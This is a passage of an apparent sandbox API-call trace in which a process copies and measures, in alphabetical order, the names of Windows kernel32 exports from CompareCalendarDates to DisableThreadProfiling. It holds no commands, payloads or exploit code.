[0087.385] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.385] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.385] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.385] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.385] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.385] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.386] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.386] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.386] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.386] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.386] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.386] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.386] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.386] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.386] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.386] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.386] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.386] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.386] lstrlenA (lpString="COPYFILEA") returned 9 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.386] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.386] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.386] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.386] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.386] lstrlenA (lpString="COPYFILEW") returned 9 [0087.386] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.387] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.387] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.387] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.387] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.387] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.387] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.387] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.387] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.387] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.387] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.387] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.387] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.387] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.387] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.387] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.387] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.387] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.387] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.388] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.388] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.388] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.388] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.388] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.388] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.388] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.388] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.388] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.388] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.388] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.388] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.388] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.388] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.388] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.388] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.389] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.389] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.389] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.389] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.389] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.389] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.389] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.389] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.389] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.389] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.389] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.389] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.389] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.389] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.389] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.389] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.389] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.389] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.389] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.389] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.390] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.390] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.390] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.390] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.390] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.390] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.390] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.390] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.390] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.390] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.390] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.390] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.390] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.390] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.390] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.390] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.390] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.390] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.390] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.391] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.391] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.391] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.391] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.391] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.391] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.391] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.391] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.391] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.391] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.391] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.391] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.391] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.391] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.391] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.391] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.391] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.391] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.391] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.391] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.392] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.392] lstrlenA (lpString="DELETEATOM") returned 10 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.392] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.392] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.392] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.392] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.392] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.392] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.392] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.392] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.392] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.392] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.392] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.392] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.392] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.392] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.392] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.392] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.392] lstrlenA (lpString="DISABLETHREADPROFILING") returned 